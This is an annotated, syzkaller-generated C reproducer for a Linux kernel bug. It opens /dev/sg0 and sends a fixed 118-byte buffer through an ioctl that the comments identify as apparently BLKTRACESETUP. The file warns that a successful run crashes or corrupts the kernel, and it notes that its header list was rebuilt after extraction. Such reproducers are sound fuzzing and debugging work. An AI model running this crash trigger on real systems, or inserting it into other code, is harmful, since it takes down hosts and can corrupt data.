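// https://syzkaller.appspot.com/bug?id=6b8d6b1847122db76e4ebd32b9d580684bac133c
// autogenerated by syzkaller (http://github.com/google/syzkaller)
//
// Reproducer for the kernel bug tracked above: it opens the first SCSI
// generic node (/dev/sg0), places a fixed 118-byte argument buffer in a
// mapping at a fixed address and issues a single ioctl on that fd. Run it
// only inside a disposable VM with the affected kernel; a successful run
// is expected to crash or corrupt that kernel, nothing else.
//
// NOTE(review): the header names were lost in extraction (nine bare
// "#include" tokens survived). The list below is reconstructed from the
// symbols this file actually uses, not from the original reproducer.
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/*
 * Open a device node, syzkaller style.
 *
 * a0 == 0xc or 0xb: open /dev/char/MAJ:MIN or /dev/block/MAJ:MIN with
 *   a1 = major and a2 = minor (both truncated to 8 bits), flags O_RDWR.
 * otherwise: a0 is a pointer to a NUL-terminated path template; every '#'
 *   in it is replaced, left to right, by successive decimal digits of a1
 *   (least significant digit first), and the result is opened with flags a2.
 *
 * Returns open(2)'s result widened to uintptr_t, so a failure shows up as
 * (uintptr_t)-1 rather than a negative number; callers that store it in a
 * signed long get -1 back.
 */
static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
{
    char buf[1024];

    if (a0 == 0xc || a0 == 0xb) {
        // Both numbers are at most three digits, so this cannot truncate;
        // snprintf keeps the bound explicit anyway.
        snprintf(buf, sizeof buf, "/dev/%s/%d:%d",
                 a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2);
        return open(buf, O_RDWR, 0);
    }

    // snprintf always NUL-terminates, unlike the strncpy it replaces, which
    // needed a manual terminator. Over-long templates are truncated.
    snprintf(buf, sizeof buf, "%s", (const char *)a0);

    // Each '#' that has been replaced is a digit, so resuming the search just
    // past it finds the next placeholder, exactly as re-scanning from the
    // start would.
    for (char *hash = strchr(buf, '#'); hash; hash = strchr(hash + 1, '#')) {
        *hash = (char)('0' + a1 % 10);
        a1 /= 10;
    }
    return open(buf, (int)a2, 0);
}

// Result slot for the one syscall whose return value the program keeps: the
// descriptor of the opened sg node. Pre-filled with -1 by loop().
long r[1];

/*
 * The reproducer body.
 *
 * 1. mmap(0x20000000, 0x7000, 3, 0x32, -1, 0): on x86 Linux 3 is
 *    PROT_READ|PROT_WRITE and 0x32 is MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS,
 *    i.e. a fixed anonymous scratch region the other steps write into.
 * 2. Copy the template "/dev/sg#" into that region and open it with
 *    a1 = 0, which yields "/dev/sg0" opened with flags 0 (O_RDONLY).
 * 3. Copy the 118-byte ioctl argument to 0x20001f8a; it ends exactly at
 *    0x20002000, inside the 0x7000-byte mapping.
 * 4. ioctl(fd, 0xc0481273, 0x20001f8a). The request decodes as
 *    _IOC(_IOC_READ|_IOC_WRITE, type 0x12, nr 0x73, size 72); type 0x12 is
 *    the block-layer ioctl group and nr 115 with a 72-byte argument matches
 *    BLKTRACESETUP — confirm against the target kernel's headers.
 *
 * Return values are deliberately not checked: the reproducer mirrors the
 * original syscall sequence, and a failed open simply turns the ioctl into
 * an EBADF no-op.
 */
void loop(void)
{
    memset(r, -1, sizeof r);
    syscall(__NR_mmap, 0x20000000, 0x7000, 3, 0x32, -1, 0);
    memcpy((void *)0x20000000, "/dev/sg#", 9);
    r[0] = syz_open_dev(0x20000000, 0, 0);
    memcpy((void *)0x20001f8a,
           "\xf9\xda\x28\x06\x6d\xb5\xd5\xf8\xaf\xd8\xcf\xc6\x33\xff\x20\x6e\xef"
           "\x50\xe6\x78\x98\xb4\x2e\x5a\x8c\xb1\x6d\x6b\x4d\x5a\x92\x1f\x0c\x00"
           "\x00\x00\x01\x00\x00\x00\x01\x5b\xd8\x9b\x97\x9c\xd9\xf6\x84\x2a\xca"
           "\x1c\xe0\xf7\xcf\xf7\xad\x5f\xa9\xf5\x29\xea\xe6\xb5\x4d\xf3\x45\x95"
           "\x37\xfd\x96\x21\x6c\xa5\x83\x33\xe2\x14\x7c\x5a\xc7\x78\xab\x1f\x68"
           "\x0a\x27\x61\xea\x3b\xb2\x0a\xbe\x0f\xbe\xf2\x63\xbb\x5d\x16\x85\x42"
           "\x62\x4f\x89\x82\x83\x36\x9d\xdf\x1a\xc2\xb9\xe6\x50\x63\x7e\x7f",
           118);
    syscall(__NR_ioctl, r[0], 0xc0481273, 0x20001f8a);
}

// Entry point: a single pass of the reproducer, exit status always 0.
int main(void)
{
    loop();
    return 0;
}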